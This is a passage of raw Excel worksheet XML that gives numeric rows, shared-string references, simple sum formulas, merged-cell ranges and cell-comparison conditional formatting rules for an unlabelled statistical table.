    <row r="38" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A38" s="734" t="s">
        <v>4472</v>
      </c>
      <c r="B38" s="735"/>
      <c r="C38" s="735"/>
      <c r="D38" s="735"/>
      <c r="E38" s="735"/>
      <c r="F38" s="735"/>
      <c r="G38" s="735"/>
      <c r="H38" s="735"/>
      <c r="I38" s="735"/>
      <c r="J38" s="735"/>
      <c r="K38" s="735"/>
      <c r="L38" s="735"/>
      <c r="M38" s="735"/>
      <c r="N38" s="736"/>
      <c r="O38" s="572"/>
      <c r="P38" s="572"/>
      <c r="Q38" s="572"/>
      <c r="S38" s="214"/>
    </row>
    <row r="39" spans="1:19" ht="14.25" customHeight="1">
      <c r="A39" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B39" s="546">
        <v>0.26967994498529679</v>
      </c>
      <c r="C39" s="546">
        <v>0.65366101862718362</v>
      </c>
      <c r="D39" s="546">
        <v>0.66742381247191462</v>
      </c>
      <c r="E39" s="546">
        <v>0.75075719352954828</v>
      </c>
      <c r="F39" s="546">
        <v>0.7977240352174656</v>
      </c>
      <c r="G39" s="546">
        <v>0.86339709604245574</v>
      </c>
      <c r="H39" s="546">
        <v>0</v>
      </c>
      <c r="I39" s="546">
        <v>0.49543369430686229</v>
      </c>
      <c r="J39" s="547">
        <v>0.72613547446239479</v>
      </c>
      <c r="K39" s="548">
        <v>0.65366100000000005</v>
      </c>
      <c r="L39" s="549">
        <v>0.82572299999999998</v>
      </c>
      <c r="M39" s="550">
        <v>0.68755200000000005</v>
      </c>
      <c r="N39" s="549">
        <v>0.814639</v>
      </c>
      <c r="O39" s="214"/>
      <c r="S39" s="214"/>
    </row>
    <row r="40" spans="1:19" ht="36.75" customHeight="1">
      <c r="A40" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B40" s="260" t="s">
        <v>4567</v>
      </c>
      <c r="C40" s="260" t="s">
        <v>4568</v>
      </c>
      <c r="D40" s="260" t="s">
        <v>4569</v>
      </c>
      <c r="E40" s="260" t="s">
        <v>4570</v>
      </c>
      <c r="F40" s="260" t="s">
        <v>4571</v>
      </c>
      <c r="G40" s="260" t="s">
        <v>4572</v>
      </c>
      <c r="H40" s="260" t="s">
        <v>1786</v>
      </c>
      <c r="I40" s="260" t="s">
        <v>4313</v>
      </c>
      <c r="J40" s="312" t="s">
        <v>4573</v>
      </c>
      <c r="K40" s="436" t="s">
        <v>4820</v>
      </c>
      <c r="L40" s="437" t="s">
        <v>4821</v>
      </c>
      <c r="M40" s="315" t="s">
        <v>4822</v>
      </c>
      <c r="N40" s="437" t="s">
        <v>4823</v>
      </c>
      <c r="O40" s="262"/>
      <c r="S40" s="214"/>
    </row>
    <row r="41" spans="1:19" ht="25.5">
      <c r="A41" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B41" s="281">
        <v>22</v>
      </c>
      <c r="C41" s="281">
        <v>71</v>
      </c>
      <c r="D41" s="281">
        <v>93</v>
      </c>
      <c r="E41" s="281">
        <v>214</v>
      </c>
      <c r="F41" s="281">
        <v>229</v>
      </c>
      <c r="G41" s="281">
        <v>443</v>
      </c>
      <c r="H41" s="281">
        <v>2</v>
      </c>
      <c r="I41" s="281">
        <v>63</v>
      </c>
      <c r="J41" s="311">
        <v>154</v>
      </c>
      <c r="K41" s="451">
        <v>30</v>
      </c>
      <c r="L41" s="454">
        <v>164</v>
      </c>
      <c r="M41" s="449">
        <v>14</v>
      </c>
      <c r="N41" s="454">
        <v>28</v>
      </c>
      <c r="S41" s="214"/>
    </row>
    <row r="42" spans="1:19">
      <c r="A42" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B42" s="364">
        <v>7.2700000000000001E-2</v>
      </c>
      <c r="C42" s="364">
        <v>0.42730000000000001</v>
      </c>
      <c r="D42" s="364">
        <v>0.44550000000000001</v>
      </c>
      <c r="E42" s="364">
        <v>0.56359999999999999</v>
      </c>
      <c r="F42" s="364">
        <v>0.63639999999999997</v>
      </c>
      <c r="G42" s="364">
        <v>0.74550000000000005</v>
      </c>
      <c r="H42" s="364">
        <v>0</v>
      </c>
      <c r="I42" s="364">
        <v>0.2455</v>
      </c>
      <c r="J42" s="365">
        <v>0.52729999999999999</v>
      </c>
      <c r="K42" s="455" t="s">
        <v>4656</v>
      </c>
      <c r="L42" s="456" t="s">
        <v>4811</v>
      </c>
      <c r="M42" s="450" t="s">
        <v>4306</v>
      </c>
      <c r="N42" s="456" t="s">
        <v>4748</v>
      </c>
      <c r="S42" s="214"/>
    </row>
    <row r="43" spans="1:19">
      <c r="A43" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B43" s="281">
        <v>85</v>
      </c>
      <c r="C43" s="281">
        <v>4919</v>
      </c>
      <c r="D43" s="281">
        <v>5004</v>
      </c>
      <c r="E43" s="281">
        <v>174555</v>
      </c>
      <c r="F43" s="281">
        <v>130328</v>
      </c>
      <c r="G43" s="281">
        <v>304816</v>
      </c>
      <c r="H43" s="281">
        <f>H44+H45</f>
        <v>0</v>
      </c>
      <c r="I43" s="281">
        <f>I44+I45</f>
        <v>7249</v>
      </c>
      <c r="J43" s="281">
        <f>J44+J45</f>
        <v>12253</v>
      </c>
      <c r="K43" s="451">
        <f>K44+K45</f>
        <v>612603</v>
      </c>
      <c r="L43" s="451">
        <f t="shared" ref="L43:N43" si="8">L44+L45</f>
        <v>681059</v>
      </c>
      <c r="M43" s="451">
        <f t="shared" si="8"/>
        <v>41048</v>
      </c>
      <c r="N43" s="451">
        <f t="shared" si="8"/>
        <v>2529069</v>
      </c>
      <c r="O43" s="572"/>
      <c r="P43" s="572"/>
      <c r="Q43" s="572"/>
      <c r="S43" s="214"/>
    </row>
    <row r="44" spans="1:19">
      <c r="A44" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B44" s="281">
        <v>85</v>
      </c>
      <c r="C44" s="281">
        <v>4919</v>
      </c>
      <c r="D44" s="281">
        <v>5004</v>
      </c>
      <c r="E44" s="281">
        <v>174555</v>
      </c>
      <c r="F44" s="281">
        <v>130328</v>
      </c>
      <c r="G44" s="281">
        <v>304816</v>
      </c>
      <c r="H44" s="281">
        <v>0</v>
      </c>
      <c r="I44" s="281">
        <v>7249</v>
      </c>
      <c r="J44" s="311">
        <v>12253</v>
      </c>
      <c r="K44" s="451">
        <v>612603</v>
      </c>
      <c r="L44" s="454">
        <v>681059</v>
      </c>
      <c r="M44" s="449">
        <v>41048</v>
      </c>
      <c r="N44" s="454">
        <v>2529069</v>
      </c>
      <c r="O44" s="572"/>
      <c r="P44" s="572"/>
      <c r="Q44" s="572"/>
      <c r="S44" s="214"/>
    </row>
    <row r="45" spans="1:19">
      <c r="A45" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B45" s="281">
        <v>0</v>
      </c>
      <c r="C45" s="281">
        <v>0</v>
      </c>
      <c r="D45" s="281">
        <v>0</v>
      </c>
      <c r="E45" s="281">
        <v>0</v>
      </c>
      <c r="F45" s="281">
        <v>0</v>
      </c>
      <c r="G45" s="281">
        <v>0</v>
      </c>
      <c r="H45" s="281">
        <v>0</v>
      </c>
      <c r="I45" s="281">
        <v>0</v>
      </c>
      <c r="J45" s="311">
        <v>0</v>
      </c>
      <c r="K45" s="451">
        <v>0</v>
      </c>
      <c r="L45" s="454">
        <v>0</v>
      </c>
      <c r="M45" s="449">
        <v>0</v>
      </c>
      <c r="N45" s="454">
        <v>0</v>
      </c>
      <c r="O45" s="572"/>
      <c r="P45" s="572"/>
      <c r="Q45" s="572"/>
      <c r="S45" s="214"/>
    </row>
    <row r="46" spans="1:19" ht="13.5" thickBot="1">
      <c r="A46" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B46" s="367">
        <v>0</v>
      </c>
      <c r="C46" s="367">
        <v>0</v>
      </c>
      <c r="D46" s="367">
        <v>0</v>
      </c>
      <c r="E46" s="367">
        <v>0</v>
      </c>
      <c r="F46" s="367">
        <v>0</v>
      </c>
      <c r="G46" s="367">
        <v>0</v>
      </c>
      <c r="H46" s="367">
        <v>0</v>
      </c>
      <c r="I46" s="367">
        <v>0</v>
      </c>
      <c r="J46" s="367">
        <v>0</v>
      </c>
      <c r="K46" s="368">
        <v>0</v>
      </c>
      <c r="L46" s="457">
        <v>0</v>
      </c>
      <c r="M46" s="459">
        <v>0</v>
      </c>
      <c r="N46" s="457">
        <v>0</v>
      </c>
      <c r="O46" s="572"/>
      <c r="P46" s="572"/>
      <c r="Q46" s="572"/>
      <c r="S46" s="214"/>
    </row>
    <row r="47" spans="1:19" ht="14.25" customHeight="1" thickTop="1" thickBot="1">
      <c r="A47" s="730" t="s">
        <v>4583</v>
      </c>
      <c r="B47" s="731"/>
      <c r="C47" s="731"/>
      <c r="D47" s="731"/>
      <c r="E47" s="731"/>
      <c r="F47" s="731"/>
      <c r="G47" s="731"/>
      <c r="H47" s="731"/>
      <c r="I47" s="731"/>
      <c r="J47" s="731"/>
      <c r="K47" s="731"/>
      <c r="L47" s="731"/>
      <c r="M47" s="731"/>
      <c r="N47" s="732"/>
      <c r="O47" s="572"/>
      <c r="P47" s="572"/>
      <c r="Q47" s="572"/>
      <c r="S47" s="214"/>
    </row>
    <row r="48" spans="1:19" ht="18.75" customHeight="1" thickTop="1">
      <c r="A48" s="261" t="s">
        <v>640</v>
      </c>
      <c r="B48" s="567">
        <v>0.834507</v>
      </c>
      <c r="C48" s="567">
        <v>0.67345500000000003</v>
      </c>
      <c r="D48" s="567">
        <v>0.87522200000000006</v>
      </c>
      <c r="E48" s="567">
        <v>0.95556799999999997</v>
      </c>
      <c r="F48" s="567">
        <v>0.98874899999999999</v>
      </c>
      <c r="G48" s="567">
        <v>0.98650000000000004</v>
      </c>
      <c r="H48" s="567">
        <v>9.5346E-2</v>
      </c>
      <c r="I48" s="567">
        <v>0.69719399999999998</v>
      </c>
      <c r="J48" s="568">
        <v>0.91877799999999998</v>
      </c>
      <c r="K48" s="551">
        <v>0.76257699999999995</v>
      </c>
      <c r="L48" s="552">
        <v>0.96629299999999996</v>
      </c>
      <c r="M48" s="553">
        <v>0.83118300000000001</v>
      </c>
      <c r="N48" s="552">
        <v>0.83120000000000005</v>
      </c>
      <c r="O48" s="733"/>
      <c r="P48" s="733"/>
      <c r="Q48" s="733"/>
      <c r="S48" s="214"/>
    </row>
    <row r="49" spans="1:19" ht="34.5" customHeight="1">
      <c r="A49" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B49" s="260" t="s">
        <v>4574</v>
      </c>
      <c r="C49" s="260" t="s">
        <v>4575</v>
      </c>
      <c r="D49" s="260" t="s">
        <v>4576</v>
      </c>
      <c r="E49" s="260" t="s">
        <v>4577</v>
      </c>
      <c r="F49" s="260" t="s">
        <v>4578</v>
      </c>
      <c r="G49" s="260" t="s">
        <v>4579</v>
      </c>
      <c r="H49" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I49" s="260" t="s">
        <v>4580</v>
      </c>
      <c r="J49" s="312" t="s">
        <v>4581</v>
      </c>
      <c r="K49" s="436" t="s">
        <v>4752</v>
      </c>
      <c r="L49" s="437" t="s">
        <v>4817</v>
      </c>
      <c r="M49" s="315" t="s">
        <v>4753</v>
      </c>
      <c r="N49" s="437" t="s">
        <v>4818</v>
      </c>
      <c r="O49" s="262" t="s">
        <v>1766</v>
      </c>
      <c r="S49" s="214"/>
    </row>
    <row r="50" spans="1:19" ht="25.5">
      <c r="A50" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B50" s="281">
        <v>13</v>
      </c>
      <c r="C50" s="281">
        <v>66</v>
      </c>
      <c r="D50" s="281">
        <v>80</v>
      </c>
      <c r="E50" s="281">
        <v>183</v>
      </c>
      <c r="F50" s="281">
        <v>215</v>
      </c>
      <c r="G50" s="281">
        <v>409</v>
      </c>
      <c r="H50" s="281">
        <v>1</v>
      </c>
      <c r="I50" s="281">
        <v>51</v>
      </c>
      <c r="J50" s="311">
        <v>133</v>
      </c>
      <c r="K50" s="451">
        <v>23</v>
      </c>
      <c r="L50" s="454">
        <v>152</v>
      </c>
      <c r="M50" s="449">
        <v>9</v>
      </c>
      <c r="N50" s="454">
        <v>22</v>
      </c>
      <c r="S50" s="214"/>
    </row>
    <row r="51" spans="1:19">
      <c r="A51" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B51" s="364">
        <v>0.72729999999999995</v>
      </c>
      <c r="C51" s="364">
        <v>0.45450000000000002</v>
      </c>
      <c r="D51" s="364">
        <v>0.8</v>
      </c>
      <c r="E51" s="364">
        <v>0.94550000000000001</v>
      </c>
      <c r="F51" s="364">
        <v>1</v>
      </c>
      <c r="G51" s="364">
        <v>0.98180000000000001</v>
      </c>
      <c r="H51" s="364">
        <v>9.1000000000000004E-3</v>
      </c>
      <c r="I51" s="364">
        <v>0.5091</v>
      </c>
      <c r="J51" s="365">
        <v>0.88180000000000003</v>
      </c>
      <c r="K51" s="455" t="s">
        <v>4746</v>
      </c>
      <c r="L51" s="456" t="s">
        <v>4819</v>
      </c>
      <c r="M51" s="450" t="s">
        <v>4655</v>
      </c>
      <c r="N51" s="456" t="s">
        <v>4655</v>
      </c>
      <c r="S51" s="214"/>
    </row>
    <row r="52" spans="1:19">
      <c r="A52" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B52" s="281">
        <v>6066577</v>
      </c>
      <c r="C52" s="281">
        <v>346050</v>
      </c>
      <c r="D52" s="281">
        <v>6408844</v>
      </c>
      <c r="E52" s="281">
        <v>4867771</v>
      </c>
      <c r="F52" s="281">
        <v>2175097</v>
      </c>
      <c r="G52" s="281">
        <v>2748811</v>
      </c>
      <c r="H52" s="281">
        <v>24</v>
      </c>
      <c r="I52" s="281">
        <v>3588481</v>
      </c>
      <c r="J52" s="311">
        <v>6457670</v>
      </c>
      <c r="K52" s="653">
        <f>K53+K54</f>
        <v>695559</v>
      </c>
      <c r="L52" s="458">
        <f t="shared" ref="L52" si="9">L53+L54</f>
        <v>1176405</v>
      </c>
      <c r="M52" s="653">
        <f t="shared" ref="M52" si="10">M53+M54</f>
        <v>2534183</v>
      </c>
      <c r="N52" s="654">
        <f t="shared" ref="N52" si="11">N53+N54</f>
        <v>5048950</v>
      </c>
      <c r="O52" s="572"/>
      <c r="P52" s="572"/>
      <c r="Q52" s="572"/>
      <c r="S52" s="214"/>
    </row>
    <row r="53" spans="1:19">
      <c r="A53" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B53" s="281">
        <v>13267</v>
      </c>
      <c r="C53" s="281">
        <v>4924</v>
      </c>
      <c r="D53" s="281">
        <v>18189</v>
      </c>
      <c r="E53" s="281">
        <v>381783</v>
      </c>
      <c r="F53" s="281">
        <v>191236</v>
      </c>
      <c r="G53" s="281">
        <v>308773</v>
      </c>
      <c r="H53" s="281">
        <v>1</v>
      </c>
      <c r="I53" s="281">
        <v>7371</v>
      </c>
      <c r="J53" s="311">
        <v>25535</v>
      </c>
      <c r="K53" s="451">
        <v>655808</v>
      </c>
      <c r="L53" s="454">
        <v>954388</v>
      </c>
      <c r="M53" s="449">
        <v>2529171</v>
      </c>
      <c r="N53" s="454">
        <v>5046552</v>
      </c>
      <c r="O53" s="572"/>
      <c r="P53" s="572"/>
      <c r="Q53" s="572"/>
      <c r="S53" s="214"/>
    </row>
    <row r="54" spans="1:19">
      <c r="A54" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B54" s="281">
        <v>6053310</v>
      </c>
      <c r="C54" s="281">
        <v>341126</v>
      </c>
      <c r="D54" s="281">
        <v>6390655</v>
      </c>
      <c r="E54" s="281">
        <v>4485988</v>
      </c>
      <c r="F54" s="281">
        <v>1983861</v>
      </c>
      <c r="G54" s="281">
        <v>2440038</v>
      </c>
      <c r="H54" s="281">
        <v>23</v>
      </c>
      <c r="I54" s="281">
        <v>3581110</v>
      </c>
      <c r="J54" s="311">
        <v>6432135</v>
      </c>
      <c r="K54" s="451">
        <v>39751</v>
      </c>
      <c r="L54" s="454">
        <v>222017</v>
      </c>
      <c r="M54" s="449">
        <v>5012</v>
      </c>
      <c r="N54" s="454">
        <v>2398</v>
      </c>
      <c r="O54" s="572"/>
      <c r="P54" s="572"/>
      <c r="Q54" s="572"/>
      <c r="S54" s="214"/>
    </row>
    <row r="55" spans="1:19" ht="13.5" thickBot="1">
      <c r="A55" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B55" s="283">
        <v>456.26818421647698</v>
      </c>
      <c r="C55" s="283">
        <v>69.278229082047119</v>
      </c>
      <c r="D55" s="283">
        <v>351.34724283907855</v>
      </c>
      <c r="E55" s="283">
        <v>11.750098878158536</v>
      </c>
      <c r="F55" s="283">
        <v>10.373888807546697</v>
      </c>
      <c r="G55" s="283">
        <v>7.9023684065640456</v>
      </c>
      <c r="H55" s="283">
        <v>23</v>
      </c>
      <c r="I55" s="283">
        <v>485.83774250440916</v>
      </c>
      <c r="J55" s="283">
        <v>251.89485020560016</v>
      </c>
      <c r="K55" s="368">
        <v>6.6000000000000003E-2</v>
      </c>
      <c r="L55" s="457">
        <v>0.31940000000000002</v>
      </c>
      <c r="M55" s="459">
        <v>1.2999999999999999E-3</v>
      </c>
      <c r="N55" s="457">
        <v>5.0000000000000001E-4</v>
      </c>
      <c r="O55" s="572"/>
      <c r="P55" s="572"/>
      <c r="Q55" s="572"/>
      <c r="S55" s="214"/>
    </row>
    <row r="56" spans="1:19" ht="13.5" thickTop="1"/>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="A4:N4"/>
    <mergeCell ref="A47:N47"/>
    <mergeCell ref="O48:Q48"/>
    <mergeCell ref="B2:J2"/>
    <mergeCell ref="K2:L2"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="A29:N29"/>
    <mergeCell ref="A11:N11"/>
    <mergeCell ref="A20:N20"/>
    <mergeCell ref="A38:N38"/>
  </mergeCells>
  <conditionalFormatting sqref="B15:G15 I15:J15 B16:J18">
    <cfRule type="expression" dxfId="563" priority="466">
      <formula>IF(B15&gt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B52:J52">
    <cfRule type="expression" dxfId="562" priority="110">
      <formula>IF(OR(B52&lt;B53,B52&lt;B54),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B34:L36">
    <cfRule type="expression" dxfId="561" priority="4">
      <formula>IF(B34&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B52:L54">
    <cfRule type="expression" dxfId="560" priority="1">
      <formula>IF(B52&gt;B34,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B7:N7">
    <cfRule type="expression" dxfId="559" priority="602">
      <formula>IF(OR(B7&lt;B8,B7&lt;B9),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B12:N12">
    <cfRule type="expression" dxfId="558" priority="96">
      <formula>IF(B12&gt;B5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B19:N19">
    <cfRule type="expression" dxfId="557" priority="99">
      <formula>IF(B19&gt;B10,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B21:N21">
    <cfRule type="expression" dxfId="556" priority="97">
      <formula>IF(B21&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:N23">
    <cfRule type="expression" dxfId="555" priority="333">
      <formula>IF(B23&gt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B24:N24 B25:J25 B26:K26 B27:J27">
    <cfRule type="expression" dxfId="554" priority="267">
      <formula>IF(B24&lt;B15,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B28:N28">
    <cfRule type="expression" dxfId="553" priority="98">
      <formula>IF(B28&lt;B19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B39:N39">
    <cfRule type="expression" dxfId="552" priority="11">
      <formula>IF(B39&gt;B30,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B41:N41">
    <cfRule type="expression" dxfId="551" priority="15">
      <formula>IF(B41&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B42:N45">
    <cfRule type="expression" dxfId="550" priority="14">
      <formula>IF(B42&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B43:N43">
    <cfRule type="expression" dxfId="549" priority="165">
      <formula>IF(OR(B43&lt;B44,B43&lt;B45),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B46:N46">
    <cfRule type="expression" dxfId="548" priority="10">
      <formula>IF(B46&gt;B37,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B48:N48">
    <cfRule type="expression" dxfId="547" priority="101">
      <formula>IF(B48&lt;B39,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B50:N50">
    <cfRule type="expression" dxfId="546" priority="13">
      <formula>IF(B50&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B55:N55">
    <cfRule type="expression" dxfId="545" priority="100">
      <formula>IF(B55&lt;B46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D6:D9">
    <cfRule type="expression" dxfId="544" priority="649">
      <formula>IF(OR(D6&lt;B6,D6&lt;C6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D14:D18">
    <cfRule type="expression" dxfId="543" priority="532">
      <formula>IF(OR(D14&lt;B14,D14&lt;C14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23:D27">
    <cfRule type="expression" dxfId="542" priority="288">
      <formula>IF(OR(D23&lt;B23,D23&lt;C23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32 D34:D36">
    <cfRule type="expression" dxfId="541" priority="38">
      <formula>IF(OR(D32&lt;B32,D32&lt;C32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D41:D45">
    <cfRule type="expression" dxfId="540" priority="164">
      <formula>IF(OR(D41&lt;B41,D41&lt;C41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D50 D52:D54">
    <cfRule type="expression" dxfId="539" priority="109">
      <formula>IF(OR(D50&lt;B50,D50&lt;C50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E6:G9">
    <cfRule type="expression" dxfId="538" priority="634">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E14:G18">
    <cfRule type="expression" dxfId="537" priority="509">
      <formula>IF(E14&lt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23:G27">
    <cfRule type="expression" dxfId="536" priority="285">
      <formula>IF(E23&lt;B23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32:G32 E34:G36">
    <cfRule type="expression" dxfId="535" priority="35">
      <formula>IF(E32&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E41:G45">
    <cfRule type="expression" dxfId="534" priority="162">
      <formula>IF(E41&lt;B41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E50:G50 E52:G54">
    <cfRule type="expression" dxfId="533" priority="107">
      <formula>IF(E50&lt;B50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G6:G9">
    <cfRule type="expression" dxfId="532" priority="633">
      <formula>IF(OR(G6&lt;E6,G6&lt;F6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G14:G18">
    <cfRule type="expression" dxfId="531" priority="508">
      <formula>IF(OR(G14&lt;E14,G14&lt;F14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G23:G27">
    <cfRule type="expression" dxfId="530" priority="284">
      <formula>IF(OR(G23&lt;E23,G23&lt;F23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G32 G34:G36">
    <cfRule type="expression" dxfId="529" priority="34">
      <formula>IF(OR(G32&lt;E32,G32&lt;F32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G41:G45">
    <cfRule type="expression" dxfId="528" priority="161">
      <formula>IF(OR(G41&lt;E41,G41&lt;F41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G50 G52:G54">
    <cfRule type="expression" dxfId="527" priority="106">
      <formula>IF(OR(G50&lt;E50,G50&lt;F50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I6:I9">
    <cfRule type="expression" dxfId="526" priority="629">
      <formula>IF(I6&lt;H6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:I18">
    <cfRule type="expression" dxfId="525" priority="497">
      <formula>IF(I14&lt;H14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:I27">
    <cfRule type="expression" dxfId="524" priority="283">
      <formula>IF(I23&lt;H23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I32 I34:I36">
    <cfRule type="expression" dxfId="523" priority="33">
      <formula>IF(I32&lt;H32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I41:I45">
    <cfRule type="expression" dxfId="522" priority="160">
      <formula>IF(I41&lt;H41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I50 I52:I54">
    <cfRule type="expression" dxfId="521" priority="105">
      <formula>IF(I50&lt;H50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J6:J9">
    <cfRule type="expression" dxfId="520" priority="625">
      <formula>IF(OR(J6&lt;H6,J6&lt;I6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J14:J18">
    <cfRule type="expression" dxfId="519" priority="490">
      <formula>IF(OR(J14&lt;H14,J14&lt;I14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J23:J27">
    <cfRule type="expression" dxfId="518" priority="282">
      <formula>IF(OR(J23&lt;H23,J23&lt;I23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J32 J34:J36">
    <cfRule type="expression" dxfId="517" priority="32">
      <formula>IF(OR(J32&lt;H32,J32&lt;I32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J41:J45">
    <cfRule type="expression" dxfId="516" priority="159">
      <formula>IF(OR(J41&lt;H41,J41&lt;I41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J50 J52:J54">
    <cfRule type="expression" dxfId="515" priority="104">
      <formula>IF(OR(J50&lt;H50,J50&lt;I50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L6:L9">
    <cfRule type="expression" dxfId="514" priority="621">
      <formula>IF(L6&lt;K6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L14">
    <cfRule type="expression" dxfId="513" priority="475">
      <formula>IF(L14&lt;K14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L23:L24">
    <cfRule type="expression" dxfId="512" priority="281">
      <formula>IF(L23&lt;K23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L32">
    <cfRule type="expression" dxfId="511" priority="31">
      <formula>IF(L32&lt;K32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L34:L36">
    <cfRule type="expression" dxfId="510" priority="6">
      <formula>IF(L34&lt;K34,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L41:L45">
    <cfRule type="expression" dxfId="509" priority="158">
      <formula>IF(L41&lt;K41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L50">
    <cfRule type="expression" dxfId="508" priority="103">
      <formula>IF(L50&lt;K50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L52:L54">
    <cfRule type="expression" dxfId="507" priority="3">
      <formula>IF(L52&lt;K52,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N6:N9">
    <cfRule type="expression" dxfId="506" priority="617">
      <formula>IF(N6&lt;M6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N14">
    <cfRule type="expression" dxfId="505" priority="467">
      <formula>IF(N14&lt;M14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N23:N24">
    <cfRule type="expression" dxfId="504" priority="268">
      <formula>IF(N23&lt;M23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N32">
    <cfRule type="expression" dxfId="503" priority="30">
      <formula>IF(N32&lt;M32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N41:N45">
    <cfRule type="expression" dxfId="502" priority="157">
      <formula>IF(N41&lt;M41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N50">
    <cfRule type="expression" dxfId="501" priority="102">
